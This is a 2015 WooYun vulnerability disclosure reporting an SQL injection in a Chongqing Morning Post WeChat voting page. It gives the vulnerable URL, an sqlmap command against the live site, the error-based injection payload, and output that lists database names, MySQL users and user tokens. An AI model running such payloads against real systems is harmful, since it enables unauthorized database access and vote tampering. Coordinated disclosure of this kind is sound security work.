当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096425

漏洞标题:重庆晨报某投票页面sql注入

相关厂商:重庆晨报

漏洞作者: 齐迹

提交时间:2015-02-11 16:14

修复时间:2015-03-28 16:16

公开时间:2015-03-28 16:16

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-11: 细节已通知厂商并且等待厂商处理中
2015-02-13: 厂商已经确认,细节仅向厂商公开
2015-02-23: 细节向核心白帽子及相关领域专家公开
2015-03-05: 细节向普通白帽子公开
2015-03-15: 细节向实习白帽子公开
2015-03-28: 细节向公众公开

简要描述:

昨天晚上看到兄弟公司的小伙伴在讨论如何给自家老板刷票。
作为一名“优秀”的白帽子,怎么能干这种事情!
直接找漏洞,修改数据库岂不是来得更加快。
于是。。。。

详细说明:

网页打开
http://wx.cqcb.com/index.php?g=Wap&m=Vote&a=index&token=****&wecha_id=****‘&id=21
直接跳转了,微信打开

cqcb_sql_inject.png


sql报错了,看来确实存在问题。于是上工具。

sqlmap.py -u "http://wx.cqcb.com/index.php?g=Wap&m=Vote&a=index&token=aa&wecha_id=bb&id=21" --user-agent "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Mobile/9B176 MicroMessenger/4.3.2" -p "wecha_id"


[22:40:28] [INFO] the SQL query used returns 27 entries
[22:40:29] [INFO] retrieved: information_schema
[22:40:30] [INFO] retrieved: 2013ddfsj
[22:40:31] [INFO] retrieved: 2013teacher
[22:40:32] [INFO] retrieved: 2014buildings
[22:40:32] [INFO] retrieved: 2014cqcbcjk
[22:40:32] [INFO] retrieved: 2014cqcbydj
[22:40:33] [INFO] retrieved: 2014cqhlj
[22:40:33] [INFO] retrieved: 2014cqtc
[22:40:33] [INFO] retrieved: 2014sdjjrw
[22:40:34] [INFO] retrieved: 2014ycqnb
[22:40:34] [INFO] retrieved: 2014yxsj
[22:40:34] [INFO] retrieved: 966966
[22:40:35] [INFO] retrieved: cqcbxinwen
[22:40:35] [INFO] retrieved: ecgroup
[22:40:35] [INFO] retrieved: empirecms
[22:40:36] [INFO] retrieved: hncqcbwcom
[22:40:36] [INFO] retrieved: mysql
[22:40:36] [INFO] retrieved: pollcqcbcom
[22:40:37] [INFO] retrieved: sqbdz
[22:40:37] [INFO] retrieved: test
[22:40:38] [INFO] retrieved: topics
[22:40:38] [INFO] retrieved: wxcqcbcom
[22:40:38] [INFO] retrieved: yccqcbcom
[22:40:39] [INFO] retrieved: yccqcbpx
[22:40:39] [INFO] retrieved: ychd
[22:40:39] [INFO] retrieved: ychr
[22:40:40] [INFO] retrieved: zhuanti
[22:56:57] [INFO] retrieved: avljgc1397041839
[22:56:58] [INFO] retrieved: ob2qxjgbC8wTmFfmJdS14O-So_jg
select token,wecha_id from tp_userinfo limit 3,1 [2]:
[*] avljgc1397041839
[*] ob2qxjgbC8wTmFfmJdS14O-So_jg
database management system users [10]:
[*] ''@'6311'
[*] ''@'localhost'
[*] '094q3ja'@'localhost'
[*] 'ojasldfdfy932'@'localhost'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'6311'
[*] 'root'@'localhost'
[*] 'yc'@'%'
[*] 'yjin'@'%'

漏洞证明:

cqcb_sql_inject.png


Place: GET
Parameter: wecha_id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: g=Wap&m=Vote&a=index&token=******&wecha_id=******') AND (SELECT 1461 FROM(SELECT COUNT(*),CONCAT(0x716b796e71,(SELECT (CASE WHEN (1461=1461) THEN 1 ELSE 0 END)),0x71706e7271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('mZIw'='mZIw&id=21

修复方案:

过滤

版权声明:转载请注明来源 齐迹@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-02-13 14:58

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给重庆分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-02-12 11:47 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    洞主苏醒了